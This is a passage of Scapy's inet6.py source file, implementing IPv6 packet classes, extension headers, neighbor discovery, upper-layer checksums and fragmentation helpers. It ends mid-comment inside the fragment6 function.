############################################################################# # # # inet6.py --- IPv6 support for Scapy # # see http://natisbad.org/IPv6/ # # for more information # # # # Copyright (C) 2005 Guillaume Valadon <[email protected]> # # Arnaud Ebalard <[email protected]> # # # # This program is free software; you can redistribute it and/or modify it # # under the terms of the GNU General Public License version 2 as # # published by the Free Software Foundation. # # # # This program is distributed in the hope that it will be useful, but # # WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # ############################################################################# """ IPv6 (Internet Protocol v6). """ from __future__ import absolute_import from __future__ import print_function from hashlib import md5 import random import socket import struct from time import gmtime, strftime from scapy.arch import get_if_hwaddr from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.config import conf from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU from scapy.error import log_runtime, warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ X3BytesField, XBitField, XIntField, XShortField from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP import scapy.modules.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 
from scapy.supersocket import SuperSocket, L3RawSocket from scapy.utils import checksum, strxor from scapy.pton_ntop import inet_pton, inet_ntop from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo from scapy.volatile import RandInt, RandShort if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 if conf.route6 is None: # unused import, only to initialize conf.route6 import scapy.route6 # noqa: F401 ########################## # Neighbor cache stuff # ########################## conf.netcache.new_cache("in6_neighbor", 120) @conf.commands.register def neighsol(addr, src, iface, timeout=1, chainCC=0): """Sends and receive an ICMPv6 Neighbor Solicitation message This function sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address address. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). """ nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res @conf.commands.register def getmacbyip6(ip6, chainCC=0): """Returns the MAC address corresponding to an IPv6 address neighborCache.get() method is used on instantiated neighbor cache. 
Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if isinstance(ip6, Net6): ip6 = str(ip6) if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff, a, nh = conf.route6.route(ip6) if iff == conf.loopback_name: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# # IPv6 Class # ############################################################################# ############################################################################# ipv6nh = {0: "Hop-by-Hop Option Header", 4: "IP", 6: "TCP", 17: "UDP", 41: "IPv6", 43: "Routing Header", 44: "Fragment Header", 47: "GRE", 50: "ESP Header", 51: "AH Header", 58: "ICMPv6", 59: "No Next Header", 60: "Destination Option Header", 112: "VRRP", 132: "SCTP", 135: "Mobility Header"} ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", 50: "ESP", 51: "AH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt"} class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16 * len(i) def i2count(self, pkt, i): if isinstance(i, list): return len(i) return 0 def getfield(self, pkt, s): c = tmp_len = None if 
self.length_from is not None: tmp_len = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = b"" remain = s if tmp_len is not None: remain, ret = s[:tmp_len], s[tmp_len:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain + ret, lst def i2m(self, pkt, x): s = b"" for y in x: try: y = inet_pton(socket.AF_INET6, y) except Exception: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self, pkt, x): s = [] if x is None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" % (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self, p): if self.nh == 58: # ICMPv6 t = orb(p[0]) if len(p) > 2 and (t == 139 or t == 140): # Node Info Query return _niquery_guesser(p) if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 if t == 130 and len(p) >= 28: # RFC 3810 - 8.1. 
Query Version Distinctions return ICMPv6MLQuery2 return icmp6typescls.get(t, Raw) return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header return IPv6ExtHdrSegmentRouting return ipv6nhcls.get(self.nh, Raw) class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [BitField("version", 6, 4), BitField("tc", 0, 8), BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1")] def route(self): """Used to select the L2 address""" dst = self.dst if isinstance(dst, Gen): dst = next(iter(dst)) return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src, self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: tmp_len = len(p) - 40 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] return p def extract_padding(self, data): """Extract the IPv6 payload""" if self.plen == 0 and self.nh == 0 and len(data) >= 8: # Extract Hop-by-Hop extension length hbh_len = orb(data[1]) hbh_len = 8 + hbh_len * 8 # Extract length from the Jumbogram option # Note: the following algorithm take advantage of the Jumbo option # mandatory alignment (4n + 2, RFC2675 Section 2) jumbo_len = None idx = 0 offset = 4 * idx + 2 while offset <= len(data): opt_type = orb(data[offset]) if opt_type == 0xc2: # Jumbo option jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 break offset = 4 * idx + 2 idx += 1 if jumbo_len is None: log_runtime.info("Scapy did not find a Jumbo option") jumbo_len = 0 tmp_len = hbh_len + jumbo_len else: tmp_len = self.plen return data[:tmp_len], data[tmp_len:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133, 134, 135, 136, 
144, 145]): return struct.pack("B", self.nh) + self.payload.hashret() if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 return self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 # With segment routing header (rh == 4), the destination is # the first address of the IPv6 addresses list try: sd = self.addresses[0] except IndexError: sd = self.dst if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? 
ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, ss) return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 else: return struct.pack("B", nh) + self.payload.hashret() def answers(self, other): if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP if self.nh in [4, 41]: return self.payload.answers(other) if isinstance(other, IPv6) and other.nh in [4, 41]: return self.answers(other.payload) if isinstance(other, IP) and other.proto in [4, 41]: return self.answers(other.payload) if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: # ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... 
return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) class _IPv46(IP): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. 
""" @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: if orb(_pkt[0]) >> 4 == 6: return IPv6 elif kargs.get("version") == 6: return IPv6 return IP def inet6_register_l3(l2, l3): return getmacbyip6(l3.dst) conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # < Basic case (ss == os and request_has_rh)): # ^ Request has a RH : don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) res = s1[:tmp_len] == s2[:tmp_len] # recall saved values otherup.options = old_otherup_opts otherup.chksum = 
old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) return s1[:tmp_len] == s2[:tmp_len] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# # Upper Layer Checksum computation # ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0)] def in6_chksum(nh, u, p): """ As Specified in RFC 2460 - 8.1 Upper-Layer Checksums Performs IPv6 Upper Layer checksum computation. This function operates by filling a pseudo header class instance (PseudoIPv6) with: - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). - the length is the length of provided payload string ('p') :param nh: value of upper layer protocol :param u: upper layer instance (TCP, UDP, ICMPv6*, ). 
Instance must be provided with all under layers (IPv6 and all extension headers, for example) :param p: the payload of the upper layer provided as a string """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u is not None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[0] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = raw(ph6) return checksum(ph6s + p) ############################################################################# ############################################################################# # Extension Headers # ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPv6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... # IPv6 options for Extension Headers # _hbhopts = {0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option"} class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) 
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route"} def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement usually expressed xn+y, meaning the Option Type must appear at an integer multiple of x octets from the start of the header, plus y octets. That function is provided the current position from the start of the header and returns required padding length. 
""" return 0 @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in _hbhoptcls: return _hbhoptcls[o] return cls def extract_padding(self, p): return b"", p class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, {0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", # noqa: E501 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved"})] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 # TODO : IANA has defined ranges of values which can't be easily represented here. 
# noqa: E501 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 y = 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None)] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 y = 2 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::")] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 y = 6 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p _hbhoptcls = {0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO} # Hop-by-Hop Extension Header # class _OptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, *args, **kargs): self.curpos = curpos PacketListField.__init__(self, name, default, cls, *args, **kargs) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except Exception: autopad = 1 if not autopad: return b"".join(map(str, x)) curpos = self.curpos s = b"" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) pstr = raw(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 
2))) return s def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) class _PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 0}} # Destination Option Header # class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 60}} # Routing Header # class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... 
# noqa: E501 IP6ListField("addresses", [], length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Segment Routing Header # # This implementation is based on draft 06, available at: # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 class IPv6ExtHdrSegmentRoutingTLV(Packet): name = "IPv6 Option Header Segment Routing - Generic TLV" fields_desc = [ByteField("type", 0), ByteField("len", 0), ByteField("reserved", 0), ByteField("flags", 0), StrLenField("value", "", length_from=lambda pkt: pkt.len)] def extract_padding(self, p): return b"", p registered_sr_tlv = {} @classmethod def register_variant(cls): cls.registered_sr_tlv[cls.type.default] = cls @classmethod def dispatch_hook(cls, pkt=None, *args, **kargs): if pkt: tmp_type = orb(pkt[0]) return cls.registered_sr_tlv.get(tmp_type, cls) return cls class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Ingress Node TLV" fields_desc = [ByteField("type", 1), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("ingress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Egress Node TLV" fields_desc = [ByteField("type", 2), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("egress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Padding TLV" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="padding", fmt="B"), StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): name = "IPv6 Option Header Segment Routing" fields_desc = [ByteEnumField("nh", 
59, ipv6nh), ByteField("len", None), ByteField("type", 4), ByteField("segleft", None), ByteField("lastentry", None), BitField("unused1", 0, 1), BitField("protected", 0, 1), BitField("oam", 0, 1), BitField("alert", 0, 1), BitField("hmac", 0, 1), BitField("unused2", 0, 3), ShortField("tag", 0), IP6ListField("addresses", ["::1"], count_from=lambda pkt: (pkt.lastentry + 1)), PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV, length_from=lambda pkt: 8 * pkt.len - 16 * ( pkt.lastentry + 1 ))] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.len is None: # The extension must be align on 8 bytes tmp_mod = (len(pkt) - 8) % 8 if tmp_mod == 1: warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte!") elif tmp_mod >= 2: # Add the padding extension tmp_pad = b"\x00" * (tmp_mod - 2) tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) pkt += raw(tlv) tmp_len = (len(pkt) - 8) // 8 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] if self.segleft is None: tmp_len = len(self.addresses) if tmp_len: tmp_len -= 1 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] if self.lastentry is None: lastentry = len(self.addresses) if lastentry == 0: warning( "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" ) else: lastentry -= 1 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Fragmentation Header # class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None)] overload_fields = {IPv6: {"nh": 44}} def guess_payload_class(self, p): if self.offset > 0: return Raw else: return super(IPv6ExtHdrFragment, self).guess_payload_class(p) def defragment6(packets): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. 
""" # Remove non fragments lst = [x for x in packets if IPv6ExtHdrFragment in x] if not lst: return [] id = lst[0][IPv6ExtHdrFragment].id llen = len(lst) lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] if len(lst) != llen: warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 # reorder fragments res = [] while lst: min_pos = 0 min_offset = lst[0][IPv6ExtHdrFragment].offset for p in lst: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(lst[min_pos]) del(lst[min_pos]) # regenerate the fragmentable part fragmentable = b"" for p in res: q = p[IPv6ExtHdrFragment] offset = 8 * q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 fragmentable += b"X" * (offset - len(fragmentable)) fragmentable += raw(q.payload) # Regenerate the unfragmentable part. q = res[0].copy() nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) del(q.plen) if q[IPv6].underlayer: q[IPv6] = IPv6(raw(q[IPv6])) else: q = IPv6(raw(q)) return q def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. 'fragSize' argument is the expected maximum size of fragment data (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is added to first IPv6 layer found. If no IPv6 layer exists packet is returned in result list unmodified. 
""" pkt = pkt.copy() if IPv6ExtHdrFragment not in pkt: if IPv6 not in pkt: return [pkt] layer3 = pkt[IPv6] data = layer3.payload frag = IPv6ExtHdrFragment(nh=layer3.nh) layer3.remove_payload() del(layer3.nh) del(layer3.plen) frag.add_payload(data) layer3.add_payload(frag) # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 return [] s = raw(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = raw(IPv6(src="::1", dst="::1") / fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart / fragHeader / fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during 